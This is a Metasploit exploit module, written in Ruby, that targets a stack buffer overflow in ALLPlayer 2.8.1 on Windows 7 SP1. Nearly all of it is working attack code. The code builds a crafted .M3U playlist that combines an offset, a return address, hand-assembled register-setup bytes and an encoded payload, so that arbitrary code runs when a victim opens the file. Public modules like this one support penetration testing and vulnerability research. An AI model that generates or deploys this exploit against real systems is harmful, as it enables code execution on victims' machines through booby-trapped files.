## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'ALLPlayer M3U Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in ALLPlayer 2.8.1, caused by a long string in a playlist entry. By persuading the victim to open a specially-crafted .M3U file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows 7 SP1. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom', # Vulnerability discovery 'Mike Czumak', # Original exploit 'Gabor Seljan' # Metasploit module ], 'References' => [ [ 'BID', '62926' ], [ 'BID', '63896' ], [ 'EDB', '28855' ], [ 'EDB', '29549' ], [ 'EDB', '29798' ], [ 'EDB', '32041' ], [ 'OSVDB', '98283' ], [ 'URL', 'http://www.allplayer.org/' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process' }, 'Platform' => 'win', 'Payload' => { 'DisableNops' => true, 'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f", 'Space' => 3060, 'EncoderType' => Msf::Encoder::Type::AlphanumUnicodeMixed, 'EncoderOptions' => { 'BufferRegister' => 'EAX' } }, 'Targets' => [ [ ' ALLPlayer 2.8.1 / Windows 7 SP1', { 'Offset' => 301, 'Ret' => "\x50\x45", # POP POP RET from ALLPlayer.exe 'Nop' => "\x6e" # ADD BYTE PTR DS:[ESI],CH } ] ], 'Privileged' => false, 'DisclosureDate' => 'Oct 09 2013', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u']) ], self.class) end def exploit nop = target['Nop'] sploit = rand_text_alpha_upper(target['Offset']) sploit << "\x61\x50" # POPAD sploit << target.ret sploit << "\x53" # PUSH EBX sploit << nop sploit 
<< "\x58" # POP EAX sploit << nop sploit << "\x05\x14\x11" # ADD EAX,0x11001400 sploit << nop sploit << "\x2d\x13\x11" # SUB EAX,0x11001300 sploit << nop sploit << "\x50" # PUSH EAX sploit << nop sploit << "\xc3" # RET sploit << nop * 109 sploit << payload.encoded sploit << rand_text_alpha_upper(10000) # Generate exception # Create the file print_status("Creating '#{datastore['FILENAME']}' file ...") file_create("http://" + sploit) end end source